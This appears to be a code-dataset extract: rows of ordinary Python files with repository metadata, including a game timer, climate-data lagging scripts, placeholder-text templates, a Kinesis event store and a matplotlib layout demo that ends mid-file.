blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
โ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
โ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
โ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe08790f0a1ce9cb7efb4031c9bbf11adbbfcec9
|
6efdee46507c2f2d05e4986c963f189a1e754e9b
|
/ex15.py
|
048204e2129b9aea9b9230e4d635d3eca03a682d
|
[] |
no_license
|
SachinPitale/Python
|
b0d2d08f6f12bdce8a30ba9e9c370d3415721168
|
6889527b4b04e394feedcd6516e0298cccb6c5ee
|
refs/heads/master
| 2020-07-26T05:59:46.325528 | 2019-09-15T07:26:24 | 2019-09-15T07:26:24 | 208,557,473 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 246 |
py
|
from sys import argv
script, filename = argv
txt = open(filename)
print "Here's your file %r :" %filename
print txt.read()
print "type the file name again "
file_again = raw_input("> ")
txt_again = open(file_again)
print txt_again.read()
|
[
"[email protected]"
] | |
689f182aaf2c3e12e5345b5f4029c3a84a26d873
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_unshakeable.py
|
e5580220c428d26267e79c308054751c325bd982
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 464 |
py
|
#calss header
class _UNSHAKEABLE():
def __init__(self,):
self.name = "UNSHAKEABLE"
self.definitions = [u"If someone's trust or belief is unshakeable, it is firm and cannot be made weaker or destroyed: "]
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
|
[
"[email protected]"
] | |
1fb2df762dd45f6aa9845f161da2ee0c3e55bf03
|
77f5a8d34aadc697e95671f1c9b17ca547e2b4c1
|
/xierpa3/contributions/filibuster/content/creditcard.py
|
3038f19db04632a24c976e6344a1a4cf9dd30217
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
dungmv56/Xierpa3
|
ef9f37a62a5b739e6e41f8bbe683820771a2f22e
|
1e5fecaee84204401f3cc7ccea10092cb31029bf
|
refs/heads/master
| 2020-12-24T11:17:31.945821 | 2016-02-25T11:39:08 | 2016-02-25T11:39:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,697 |
py
|
# -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# Contributed by Erik van Blokland and Jonathan Hoefler
# Original from filibuster.
#
# FILIBUSTER.ORG!
"""
living
--------------------------------------------------------------------
"""
__version__ = '3.0.0'
__author__ = "someone"

# Filibuster content definitions for fake credit-card names, numbers and
# related marketing copy. Each key maps a tag to the list of template
# strings (or literals) it can expand to; <#tag#> markers are resolved
# recursively by the filibuster engine. Tags not defined here (e.g.
# <#company#>, <#figs#>) presumably come from sibling content modules —
# TODO confirm against the engine's tag registry.
content = {
    'creditcard': [
        '<#p_cc_flavor#><#p_cc_sx#>',
        '<#p_cc_flavor#><#p_cc_flavor#><#p_cc_sx#>',
        '<#p_cc_quality#> <#p_cc_flavor#><#p_cc_sx#>',
        '<#p_cc_quality#> <#p_cc_flavor#><#p_cc_sx#>',
    ],
    'creditcard_accepted': [
        '<#company#> welcomes <#creditcard#>',
        '<#company#> prefers <#creditcard#>',
        'We welcome <#creditcard#>',
        'We prefer <#creditcard#>',
        '<#creditcard#> preferred!',
        '<#creditcard#> accepted.',
        'Pay with <#creditcard#>',
    ],
    'creditcard_issued': [
        '<#p_cc_issuer#> <#creditcard#>',
        u'<#p_cc_issuer#>โs <#creditcard#>',
        '<#creditcard#>, by <#p_cc_issuer#>',
    ],
    # 16-digit number rendered as four groups of four figures.
    'creditcard_number': [
        '<#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#> <#figs#><#figs#><#figs#><#figs#>',
    ],
    'creditcard_validuntil': [
        '<#time_months#> <#time_comingyears#>',
    ],
    # Two- or three-letter all-caps acronyms.
    'p_acronym': [
        '<#alphabet_caps#><#alphabet_caps#>',
        '<#alphabet_caps#><#alphabet_caps#><#alphabet_caps#>',
    ],
    # Card-name "flavor": picks one of the themed word lists below.
    'p_cc_flavor': [
        '<#p_cc_flavor_common#>',
        '<#p_cc_flavor_nonsense#>',
        '<#name_japanese#>',
        '<#p_cc_flavor_religious#>',
        '<#p_cc_flavor_super#>',
        '<#p_cc_flavor_count#>',
        '<#p_cc_flavor_sweet#>',
        '<#p_cc_flavor_shop#>',
        '<#p_cc_flavor_money#>',
        '<#p_cc_flavor_modern#>',
        '<#p_cc_flavor_currency#>',
        '<#p_cc_flavor_locale#>',
        '<#p_cc_flavor_odd#>',
        '<#p_cc_flavor_others#>',
    ],
    'p_cc_flavor_common': [
        'Direct',
        'Media',
        'Uni',
        'Family',
        'Member',
        'Diner',
    ],
    'p_cc_flavor_count': [
        'Twin',
        'Bi',
        'Duo',
        'Tri',
        'Trio',
        'Quatro',
        'Penta',
    ],
    'p_cc_flavor_currency': [
        'Dime',
        '<#sci_transition_metals#>Dollar',
        'Dollar',
        'Sterling',
        'Change',
    ],
    'p_cc_flavor_locale': [
        'Euro',
        'Asia',
        'US',
        'HK',
    ],
    'p_cc_flavor_modern': [
        'Com',
        'Phone',
        'Smart',
        'Swipe',
        'Compu',
        'Terminal',
        'Electro',
        'Plasti',
        'Chem',
        'Chemi',
        'Chemo',
        'Net',
        'Web',
        'SET',
        'Inter',
    ],
    'p_cc_flavor_money': [
        'Buy',
        'Cash',
        'Kash',
        'Money',
        'Pecunia',
        'Debet',
        'Debt',
        'Specu',
        'Pin',
        'Chipper',
    ],
    'p_cc_flavor_nonsense': [
        'Exi',
        'Minto',
        'Exo',
        'Mondo',
        'Fina',
    ],
    'p_cc_flavor_odd': [
        'Gas',
        'Petro',
        'Petroli',
    ],
    'p_cc_flavor_others': [
        '<#p_acronym#>',
        '<#p_co_creative#>',
        '<#p_co_mediaprefix#>',
        '<#p_business_name#>',
        '<#p_cc_quality#>',
    ],
    'p_cc_flavor_religious': [
        'Pure',
        'Reli',
        'Holy',
        'Spiri',
        'God',
        'Noble',
    ],
    'p_cc_flavor_shop': [
        'Excel',
        'Access',
        'XS',
        'Fast',
        'Digi',
        'E',
        'Shop',
        'Store',
        'Market',
    ],
    'p_cc_flavor_super': [
        'Super',
        'Hyper',
        'Ultra',
        'Kid',
        'Major',
        'Minor',
    ],
    'p_cc_flavor_sweet': [
        'Courtesy',
        'Polite',
        'Nice',
        'Comfort',
        'Friendly',
        'Friendli',
    ],
    # Issuer expands to a company/bank name from other content modules.
    'p_cc_issuer': [
        '<#company#>',
        '<#eurobank#>',
        '<#usbank#>',
        '<#name_japanese#>',
    ],
    # Repeated entries raise the relative pick probability of element names.
    'p_cc_quality': [
        'Personal',
        'Home',
        'Business',
        'Corporate',
        '<#sci_popularelements#>',
        '<#sci_popularelements#>',
        '<#sci_popularelements#>',
        '<#sci_popularelements#>',
    ],
    # Repeated 'Card' entries make it the most likely suffix.
    'p_cc_sx': [
        'Card',
        'Card',
        'Card',
        'Card',
        'Credit',
        'Express',
    ],
}
|
[
"[email protected]"
] | |
de8214dd5f2792bdca5eccdda107e72222c30130
|
58115fa94a81b02a8b194fe7f1c1cd4ff996df97
|
/src/anyconfig/schema/__init__.py
|
1437437066cf8b3c7b6580abe489d66ce4816ad7
|
[
"MIT"
] |
permissive
|
Terrance-forks/python-anyconfig
|
9f77de334c162e1c2334a749c29f63bd0294a09b
|
21d7c0e30287569b394972557b5a54fab03bcd5c
|
refs/heads/master
| 2021-06-19T09:11:18.697637 | 2021-05-17T04:35:10 | 2021-05-17T04:35:10 | 202,930,334 | 0 | 0 |
MIT
| 2019-08-17T20:52:23 | 2019-08-17T20:52:22 | null |
UTF-8
|
Python
| false | false | 451 |
py
|
#
# Copyright (C) 2021 Satoru SATOH <[email protected]>
# SPDX-License-Identifier: MIT
#
r"""misc global constants, variables, classes and so on.
"""
# Prefer the jsonschema-backed implementation; fall back to the package's
# default backend when the optional 'jsonschema' dependency is missing.
try:
    from .jsonschema import validate, is_valid, gen_schema
    # True when real schema validation is available.
    SUPPORTED: bool = True
except ImportError:
    from .default import validate, is_valid, gen_schema
    SUPPORTED = False  # type: ignore
# Public API of this sub-package.
__all__ = [
    'validate', 'is_valid', 'gen_schema', 'SUPPORTED'
]
# vim:sw=4:ts=4:et:
|
[
"[email protected]"
] | |
98730ea9cabba62f347e29709bcad21695798feb
|
b6dce5523115d7e51ce1c5bf11ca963f9a17f04c
|
/shift/utils/timer.py
|
4be249aeb97ad182f8bf6179f4a88b92a227a55e
|
[
"MIT"
] |
permissive
|
fyabc/Py2016
|
1fcb345df6bcd89348686e13337158aa4325a8e0
|
a7e2b4ad11c96be97107821defef379d6e6f7595
|
refs/heads/master
| 2020-12-29T02:37:17.580568 | 2017-02-27T16:18:02 | 2017-02-27T16:18:02 | 54,388,415 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,084 |
py
|
# -*- coding: utf-8 -*-
__author__ = 'fyabc'
import pygame
import time
class ShiftTimer:
    """The Timer of this game. Copied from pgu.timer.
    This is a singleton class. Do NOT have two ShiftTimer object at the same time.
    """

    lastGameTime = None   # game time at the last clock-parameter change
    lastRealTime = None   # real time corresponding to lastGameTime
    lastTickTime = None   # game time when tick() was last called
    paused = False        # whether the clock is currently frozen
    startTime = None      # real time at construction
    speed = 1             # clock rate relative to the real clock

    def __init__(self):
        self.lastGameTime = 0
        self.lastTickTime = 0
        self.lastRealTime = time.time()
        self.startTime = time.time()

    def set_speed(self, n):
        """Set the rate at which this clock ticks relative to the real clock."""
        assert n >= 0
        # Re-anchor game time before changing the rate so already-elapsed
        # game time is preserved.
        self.lastGameTime = self.getTime()
        self.lastRealTime = time.time()
        self.speed = n

    def pause(self):
        """Freeze the clock. No-op when already paused."""
        if self.paused:
            return
        self.lastGameTime = self.getTime()
        self.lastRealTime = time.time()
        self.paused = True

    def resume(self):
        """Restart a paused clock. No-op when already running."""
        if not self.paused:
            return
        self.paused = False
        self.lastRealTime = time.time()

    def tick(self, fps=0):
        """Advance the tick clock and return the game-time delta.

        When fps > 0, sleep just long enough that at most `fps` ticks
        happen per second.
        """
        now = self.getTime()
        elapsed = now - self.lastTickTime
        if fps > 0:
            frame_time = 1.0 / fps
            if elapsed < frame_time:
                pygame.time.wait(int((frame_time - elapsed) * 1000))
                elapsed = frame_time
        self.lastTickTime = now
        return elapsed

    def getTime(self):
        """Game time elapsed since creation; paused time does not count."""
        if self.paused:
            return self.lastGameTime
        return self.speed * (time.time() - self.lastRealTime) + self.lastGameTime

    def getRealTime(self):
        """Wall-clock seconds since this timer was created."""
        return time.time() - self.startTime
|
[
"[email protected]"
] | |
2db6b9d03d9ffa6ad05fa7db612b7e2db5364dd6
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/merra_scripts/02_preprocessing/merraLagScripts/443-tideGauge.py
|
1cfa0de339d2f9659ec80f2176dd2e40a6ad8413
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,772 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
# dir_name = 'F:\\01_erainterim\\03_eraint_lagged_predictors\\eraint_D3'
dir_in = "/lustre/fs0/home/mtadesse/merraAllCombined"
dir_out = "/lustre/fs0/home/mtadesse/merraAllLagged"

def lag():
    """Build hourly-lagged copies of one tide-gauge MERRA predictor CSV.

    Reads the CSV for gauge index 443 from dir_in, creates 31 time-shifted
    (0..30 h) copies of every predictor column by merging on shifted dates,
    and writes the combined wide dataframe to dir_out under the same name.
    Side effects: changes the process working directory (chdir).
    """
    os.chdir(dir_in)
    #get names (sorted so the numeric index below is reproducible)
    tg_list_name = sorted(os.listdir())
    # This script is one shard of a batch: it processes only gauge #443.
    x = 443
    y = 444
    for tg in range(x, y):
        os.chdir(dir_in)
        tg_name = tg_list_name[tg]
        print(tg_name, '\n')
        pred = pd.read_csv(tg_name)
        #create a daily time series - date_range
        #get only the ymd of the start and end times
        start_time = pred['date'][0].split(' ')[0]
        end_time = pred['date'].iloc[-1].split(' ')[0]
        print(start_time, ' - ', end_time, '\n')
        date_range = pd.date_range(start_time, end_time, freq = 'D')
        #defining time changing lambda functions
        time_str = lambda x: str(x)
        time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
        time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
        """
        first prepare the six time lagging dataframes
        then use the merge function to merge the original
        predictor with the lagging dataframes
        """
        #prepare lagged time series for time only
        #note here that since MERRA has 3hrly data
        #the lag_hrs is increased from 6(eraint) to 31(MERRA)
        time_lagged = pd.DataFrame()
        lag_hrs = list(range(0, 31))
        for lag in lag_hrs:
            lag_name = 'lag'+str(lag)
            # lambda is consumed immediately by map(), so the loop variable
            # 'lag' is bound at the right value for each iteration
            lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
            lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
                                   columns = [lag_name])
            time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
        #dataframe that contains all lagged time series (just time)
        time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
        pred_lagged = pd.DataFrame()
        for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
            print(time_all.columns[ii])
            #extracting corresponding lag time series
            lag_ts = pd.DataFrame(time_all.iloc[:,ii])
            lag_ts.columns = ['date']
            #merge the selected lagged time with the predictor on = "date"
            pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
            pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
            #sometimes nan values go to the bottom of the dataframe
            #sort df by date -> reset the index -> remove old index
            pred_new.sort_values(by = 'date', inplace=True)
            pred_new.reset_index(inplace=True)
            pred_new.drop('index', axis = 1, inplace= True)
            #concatenate lagged dataframe (skip the duplicate date column
            #after the first merge)
            if ii == 1:
                pred_lagged = pred_new
            else:
                pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
        #cd to saving directory
        os.chdir(dir_out)
        pred_lagged.to_csv(tg_name)
        os.chdir(dir_in)

#run script
lag()
|
[
"[email protected]"
] | |
64411eeed18edf4d09de5cf319c24119d1bea4e2
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/02_preprocessing/lag82/443-tideGauge.py
|
00c7b277a09c1bb696c020bb8ff48ee0b7724626
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,984 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
dir_in = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
dir_out = '/lustre/fs0/home/mtadesse/eraFiveLag'

def lag():
    """Build hourly-lagged copies of one tide-gauge ERA5 predictor CSV.

    Reads the CSV for gauge index 443 from dir_in, creates 6 time-shifted
    (0..30 h, step 6) copies of every predictor column by merging on
    shifted dates, and writes the combined dataframe to dir_out.
    Side effects: changes the process working directory (chdir).
    """
    os.chdir(dir_in)
    #get names
    # NOTE(review): os.listdir() order is OS-dependent; the sibling MERRA
    # script sorts here — confirm index 443 refers to the same gauge.
    tg_list_name = os.listdir()
    # One shard of a batch: only gauge index 443 is processed.
    x = 443
    y = 444
    for t in range(x, y):
        tg_name = tg_list_name[t]
        print(tg_name, '\n')
        # #check if the file exists
        # os.chdir(dir_out)
        # if (os.path.isfile(tg_name)):
        #     print('file already exists')
        #     continue
        #cd to where the actual file is
        os.chdir(dir_in)
        pred = pd.read_csv(tg_name)
        pred.sort_values(by = 'date', inplace=True)
        pred.reset_index(inplace = True)
        pred.drop('index', axis = 1, inplace = True)
        #create a daily time series - date_range
        #get only the ymd of the start and end times
        start_time = pred['date'][0].split(' ')[0]
        end_time = pred['date'].iloc[-1].split(' ')[0]
        print(start_time, ' - ', end_time, '\n')
        date_range = pd.date_range(start_time, end_time, freq = 'D')
        #defining time changing lambda functions
        time_str = lambda x: str(x)
        time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
        time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
        """
        first prepare the six time lagging dataframes
        then use the merge function to merge the original
        predictor with the lagging dataframes
        """
        #prepare lagged time series for time only
        #note here that since ERA20C has 3hrly data
        #the lag_hrs is increased from 6(eraint) to 11 (era20C)
        time_lagged = pd.DataFrame()
        lag_hrs = [0, 6, 12, 18, 24, 30]
        for lag in lag_hrs:
            lag_name = 'lag'+str(lag)
            # lambda is consumed immediately by map(), so the loop variable
            # 'lag' is bound at the right value for each iteration
            lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
            lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
                                   columns = [lag_name])
            time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
        #dataframe that contains all lagged time series (just time)
        time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
        pred_lagged = pd.DataFrame()
        for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
            print(time_all.columns[ii])
            #extracting corresponding lag time series
            lag_ts = pd.DataFrame(time_all.iloc[:,ii])
            lag_ts.columns = ['date']
            #merge the selected lagged time with the predictor on = "date"
            pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
            pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
            #sometimes nan values go to the bottom of the dataframe
            #sort df by date -> reset the index -> remove old index
            pred_new.sort_values(by = 'date', inplace=True)
            pred_new.reset_index(inplace=True)
            pred_new.drop('index', axis = 1, inplace= True)
            #concatenate lagged dataframe (skip the duplicate date column
            #after the first merge)
            if ii == 1:
                pred_lagged = pred_new
            else:
                pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
        #cd to saving directory
        os.chdir(dir_out)
        pred_lagged.to_csv(tg_name)
        os.chdir(dir_in)

#run script
lag()
|
[
"[email protected]"
] | |
f5c65c37b451bb7845cec225a79a12aa20bfce04
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/KPicBthv6WhHFGapg_17.py
|
7aa3aa5f1a8fb508597b2d6bcee51885d1d6d0bd
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 595 |
py
|
"""
Create a function that returns the **number of syllables** in a simple string.
The string is made up of _short repeated words_ like `"Lalalalalalala"` (which
would have _7 syllables_ ).
### Examples
count_syllables("Hehehehehehe") โ 6
count_syllables("bobobobobobobobo") โ 8
count_syllables("NANANA") โ 3
### Notes
* For simplicity, please note that each syllable will consist of two letters only.
* Your code should accept strings of any case (upper, lower and mixed case).
"""
def count_syllables(txt):
    """Count two-letter syllables in a repeated-word string, case-insensitively.

    The first two characters define the syllable; occurrences of that
    pair in the lower-cased string are counted.
    """
    lowered = txt.lower()
    first_syllable = lowered[0:2]
    return lowered.count(first_syllable)
|
[
"[email protected]"
] | |
f066cea6f931f46a65d678f695ba5d46150afd2f
|
75402b6c851a12ae41359fdd83e89d2160c308af
|
/zentral/core/stores/backends/kinesis.py
|
a5c04ab974baab80ac23fec6e49719b18ff53a28
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-commercial-license"
] |
permissive
|
neocode12/zentral
|
7b05aeeb823a5a3d7d268cc2b01e0bf1a5e4be71
|
9ecc8d8334148627fcccaa875f100adacd7a018b
|
refs/heads/main
| 2023-04-09T12:06:45.355559 | 2023-03-15T14:05:05 | 2023-03-15T14:05:05 | 327,651,549 | 0 | 0 |
Apache-2.0
| 2021-01-07T15:30:00 | 2021-01-07T15:30:00 | null |
UTF-8
|
Python
| false | false | 4,096 |
py
|
import logging
import boto3
from kombu.utils import json
from zentral.core.exceptions import ImproperlyConfigured
from zentral.core.stores.backends.base import BaseEventStore
from zentral.utils.boto3 import make_refreshable_assume_role_session
logger = logging.getLogger('zentral.core.stores.backends.kinesis')
class EventStore(BaseEventStore):
    """Event store backend that ships Zentral events to an AWS Kinesis stream."""

    # Kinesis PutRecords accepts at most 500 records per request.
    max_batch_size = 500

    def __init__(self, config_d):
        """Read stream, region, credentials and serialization format from config_d.

        Raises ImproperlyConfigured for an unknown serialization format.
        """
        super(EventStore, self).__init__(config_d)
        self.stream = config_d["stream"]
        self.region_name = config_d["region_name"]
        self.credentials = {}
        # Pass explicit static credentials only when configured; otherwise
        # boto3 falls back to its default credential chain.
        for k in ("aws_access_key_id", "aws_secret_access_key"):
            v = config_d.get(k)
            if v:
                self.credentials[k] = v
        self.assume_role_arn = config_d.get("assume_role_arn")
        self.serialization_format = config_d.get("serialization_format", "zentral")
        if self.serialization_format not in ("zentral", "firehose_v1"):
            raise ImproperlyConfigured("Unknown serialization format")

    def wait_and_configure(self):
        """Create the boto3 Kinesis client, assuming a role first if configured."""
        session = boto3.Session(**self.credentials)
        if self.assume_role_arn:
            logger.info("Assume role %s", self.assume_role_arn)
            # Refreshable session so long-lived processes survive STS expiry.
            session = make_refreshable_assume_role_session(
                session,
                {"RoleArn": self.assume_role_arn,
                 "RoleSessionName": "ZentralStoreKinesis"}
            )
        self.client = session.client('kinesis', region_name=self.region_name)
        self.configured = True

    def _serialize_event(self, event):
        """Serialize an event.

        Returns a 4-tuple: (JSON-encoded bytes, partition key, event id,
        event index). Accepts either an event object (serialized via its
        serialize() method) or an already-serialized dict.
        """
        if not isinstance(event, dict):
            event_d = event.serialize()
        else:
            event_d = event
        event_id = event_d['_zentral']['id']
        event_index = event_d['_zentral']['index']
        # id+index identifies the event and spreads records across shards.
        partition_key = f"{event_id}{event_index}"
        if self.serialization_format == "firehose_v1":
            # Flatten the _zentral metadata into the firehose_v1 schema.
            metadata = event_d.pop("_zentral")
            event_type = metadata.pop("type")
            created_at = metadata.pop("created_at")
            tags = metadata.pop("tags", [])
            objects = metadata.pop("objects", {})
            serial_number = metadata.pop("machine_serial_number", None)
            event_d = {
                "type": event_type,
                "created_at": created_at,
                "tags": tags,
                "probes": [probe_d["pk"] for probe_d in metadata.get("probes", [])],
                "objects": [f"{k}:{v}" for k in objects for v in objects[k]],
                "metadata": json.dumps(metadata),
                "payload": json.dumps(event_d),
                "serial_number": serial_number
            }
        return json.dumps(event_d).encode("utf-8"), partition_key, event_id, event_index

    def store(self, event):
        """Store a single event via PutRecord; returns the API response."""
        self.wait_and_configure_if_necessary()
        data, partition_key, _, _ = self._serialize_event(event)
        return self.client.put_record(StreamName=self.stream,
                                      Data=data,
                                      PartitionKey=partition_key)

    def bulk_store(self, events):
        """Store events with one PutRecords call.

        Generator: yields the (event_id, event_index) keys of the records
        that Kinesis accepted.
        """
        self.wait_and_configure_if_necessary()
        if self.batch_size < 2:
            raise RuntimeError("bulk_store is not available when batch_size < 2")
        event_keys = []
        records = []
        for event in events:
            data, partition_key, event_id, event_index = self._serialize_event(event)
            event_keys.append((event_id, event_index))
            records.append({'Data': data, 'PartitionKey': partition_key})
        if not records:
            return
        response = self.client.put_records(Records=records, StreamName=self.stream)
        failed_record_count = response.get("FailedRecordCount", 0)
        if failed_record_count == 0:
            # shortcut: everything was accepted
            yield from event_keys
            return
        logger.warning("%s failed record(s)", failed_record_count)
        # PutRecords preserves request order, so zip pairs each key with its
        # result; accepted records carry a SequenceNumber and ShardId.
        for key, record in zip(event_keys, response.get("Records", [])):
            if record.get("SequenceNumber") and record.get("ShardId"):
                yield key
|
[
"[email protected]"
] | |
af646b7ff78e8c9fcdc8fbc2cb08695b04778a24
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/127/usersdata/218/35224/submittedfiles/ex11.py
|
4cdc5c3d13ba6d1d5401867a17bcaa65083f3520
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 543 |
py
|
# -*- coding: utf-8 -*-
# Read two dates (day, month, year) and print the most recent one,
# or 'iguais' when both are the same date.
D1=int(input('digite o dia da data 1:'))
D2=int(input('digite o dia da data 2:'))
M1=int(input('digite o mรชs da data 1:'))
M2=int(input('digite o mรชs da data 2:'))
A1=int(input('digite o ano da data 1:'))
A2=int(input('digite o ano da data 2:'))

# BUG FIX: the original printed undefined names (data1, data2, iguais),
# which raised NameError on every branch. Define them explicitly.
data1 = '%d/%d/%d' % (D1, M1, A1)
data2 = '%d/%d/%d' % (D2, M2, A2)

# Compare year first, then month, then day.
if A1>A2:
    print(data1)
elif A2>A1:
    print(data2)
else:
    if M1>M2:
        print(data1)
    elif M2>M1:
        print(data2)
    else:
        if D1>D2:
            print(data1)
        elif D2>D1:
            print(data2)
        else:
            print('iguais')
|
[
"[email protected]"
] | |
0fc2541411dcb465d061d206bdbd4ed4a27b5913
|
ea97a6d0d5ffc5ec2730b63a20b1f4de0bd8112d
|
/scurgen/test/axes_demo.py
|
a74c934af8fb6965cae2a134495e19057c3db58d
|
[] |
no_license
|
daler/scurgen
|
35d5ee35243a41b75c444f5bb71380ba80ba72c6
|
ca0e4f30e9573684b90a8123e31982490b5fe473
|
refs/heads/master
| 2020-12-24T19:18:19.587609 | 2013-03-11T16:35:33 | 2013-03-11T16:35:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,375 |
py
|
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.gridspec as gs
import numpy as np
# Layout demo: 21 chromosome panels in a square grid, with slider,
# colorbar and checkbox axes arranged around them via GridSpec.
fig = plt.figure(figsize=(10,10))
nchroms = 21
# Square-ish grid: rows = cols = round(sqrt(21)) -> 5x5.
nrows = int(np.round(np.sqrt(nchroms)))
ncols = nrows
nfiles = 3
# Figure-fraction bounds of the chromosome grid.
CHROM = dict(
    left= 0.05,
    right=0.8,
    top=0.9,
    bottom=0.2,
    wspace=0.1,
    hspace=0.1)
SLIDER_PAD = 0.01
# Slider rows sit directly below the chromosome grid.
SLIDER = dict(
    left=CHROM['left'],
    right=CHROM['right'],
    bottom=0.1,
    top=CHROM['bottom'] - SLIDER_PAD,
    hspace=0.5,
    )
CBAR_PAD = 0.01
# Colorbars to the right of the chromosome grid, vertically aligned with it.
CBAR = dict(
    left=CHROM['right'] + CBAR_PAD,
    right=0.9,
    wspace=SLIDER['hspace'],
    top=CHROM['top'],
    bottom=CHROM['bottom'],
    )
# Check boxes in the lower-right corner, aligned with sliders and colorbars.
CHECKS = dict(
    top=SLIDER['top'],
    bottom=SLIDER['bottom'],
    left=SLIDER['right'] + CBAR_PAD,
    right=CBAR['right'],
    wspace=CBAR['wspace'],
    hspace=SLIDER['hspace'])
chroms = gs.GridSpec(nrows, ncols)
chroms.update(**CHROM)
